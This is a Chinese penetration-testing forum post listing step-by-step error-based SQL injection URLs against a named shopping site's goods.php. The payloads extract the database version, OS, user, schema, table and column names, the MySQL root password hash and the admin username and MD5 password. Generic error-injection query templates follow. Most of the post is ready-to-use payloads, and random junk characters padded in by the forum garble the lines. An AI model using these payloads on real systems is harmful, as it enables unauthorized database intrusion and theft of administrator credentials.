找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 3073|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
判断版本号
- [0 `# V0 U+ ^4 R* Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 L4 P0 o- k1 k! E5 I1 ?

4 e4 v6 h4 T6 w% m/ L; |判断系统6 k7 F# N2 ~, I' Q# b
* i1 ~7 K  c7 c: [% y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 g7 k4 a- k) h0 D

* b+ G* |& ?. z! t0 o
/ M$ c9 C- U2 V  Z9 _
4 v$ |7 b4 E6 e( V/ f( K! v6 c, O当前 user()6 C0 {9 M" r  t3 T, A4 m$ `
" |0 `1 Q. ^1 T( F5 b6 f) c
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 c( M) w8 G* U) q
; h" l3 Y  K) \: e: A+ K7 @9 ~$ y# }- a& ~

3 C" c. E- k- E当前 database()
7 p+ x; L' t' k; i  Q2 Bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 }, y- _4 W8 Y2 n  S: `
7 y5 ^: _( p; `+ r% q
" n) l, t( J7 P' m# h3 J0 o* K
: _8 Y% r. }3 c+ N7 A& K. E7 R
) u% q# C* \9 O  }3 w, lroot hash7 o% o. B7 h+ s* r  {( {1 c

, M7 I# y7 d. T0 n  V1 i7 H5 ?http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 ^7 E3 l9 r/ m+ A) B
( _0 ~; w8 S& Y; e2 ^2 \/ |

! T# p2 D; }" ~0 B$ g1 U; ?  t4 k- e
当前 数据库表名7 h8 x/ K! s- Q+ D1 S. J

, U! w7 c9 S. x% Thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 K, A5 a. K, N, c' S+ s8 V8 z

* g, S- h6 t; q. s  y( T+ N' W% G1 R$ u! S; L9 {
0 ^* D4 H. W) v& U+ v* i
当前 数据库 user_name 字段
5 Z$ `5 t2 i4 D" f8 ~. Y& F' T: h  ?) v- {6 H- n
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 ~$ O  [- Q' V; `. [9 a0 ]+ Z" e
当前 数据库 字段 password( x0 i" g7 L1 L5 c# u  B
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 s" s, ^9 ~! s0 p4 }7 l% A" e6 K4 ^: x. [' h/ r# {, F

- e6 M6 ~- M2 M7 a# [0 C2 ]
. \2 n2 K; z( Z- Z& D* w获得 admin passwd(md5)- \# Y9 Y5 o& P3 Q- H9 _
7 _6 A" \/ V; I6 z1 L: X

# ?2 L. f/ V( shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( v) [! G; x1 a, I; v- N' W6 `7 v. F
  K4 y) q% r2 r! Y% \# V7 e# R" u报错注射
! b. \7 x  M. {' [SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)9 F* I) S- r4 D, \

3 |$ }( z3 p, q) b' h! q; X- c, S9 PSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
& S3 ^6 V8 Q" {- v* A/ n1 t6 P+ v% P7 c5 y' R' d6 Y! n
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表